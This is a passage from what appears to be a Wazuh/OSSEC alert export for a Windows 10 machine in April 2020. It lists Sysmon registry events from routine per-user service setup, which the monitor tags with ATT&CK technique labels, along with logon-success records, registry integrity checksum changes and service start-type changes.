10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_37a6f\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:45:28.115",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.094492900Z"",""eventRecordID"":""573"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 26, 2020 @ 10:45:28.086",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.094289900Z"",""eventRecordID"":""572"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.050",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.093326400Z"",""eventRecordID"":""571"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 26, 2020 @ 10:45:28.005",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.092786400Z"",""eventRecordID"":""570"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:27.971",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.087247900Z"",""eventRecordID"":""569"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 26, 2020 @ 10:45:27.930",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.087026700Z"",""eventRecordID"":""568"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:27.881",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.086173700Z"",""eventRecordID"":""567"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 26, 2020 @ 10:45:27.867",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.085933900Z"",""eventRecordID"":""566"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:27.833",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:23.845531500Z"",""eventRecordID"":""564"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 26, 2020 @ 10:45:27.815",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:23.844286400Z"",""eventRecordID"":""563"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:22.897",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:45:22.502",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:22.456",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x31A1C + Linked Logon ID: 0x319ED + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:22.394",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x319ED + Linked Logon ID: 0x31A1C + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:21.429",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 26, 2020 @ 10:45:19.950",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 26, 2020 @ 10:44:29.900",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:44:29.835",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:44:25.743",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:43:47.507",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '1c2ba1597228115961d6328c1fe5d3a2' +New md5sum is : '4fb3bba13c938530aea3422bc2522f8e' +Old sha1sum was: '24110a9e96de59086bd21fa5431c88af7ee637a0' +New sha1sum is : '67a286693aec034ff7ebf4413b445dd59437c852' +", +"Apr 26, 2020 @ 10:43:47.492",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : 'a1b7a53a5551301f83ed8744ce80ef20' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : 'c821e211eae5268acc65fd3cfadebc4d47232039' +", +"Apr 26, 2020 @ 10:43:23.399",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:43:02.664",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 26, 2020 @ 10:41:33.647",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:08Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:41:11.225",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : 'f6d600c5cc1ac72a221ff4e232c17714' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '367298db73f7b22370cfd87e0e07a3b3be279d67' +", +"Apr 26, 2020 @ 10:41:11.194",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '9a884b6415b722e0fe5b199f5489a78b' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'cf1e6c9ac71618055946e3482c6af9afb43e823a' +", +"Apr 26, 2020 @ 10:40:51.695",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:26Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:40:11.872",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1635805 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 26, 2020 @ 10:40:10.996",7,"Integrity checksum changed.","File 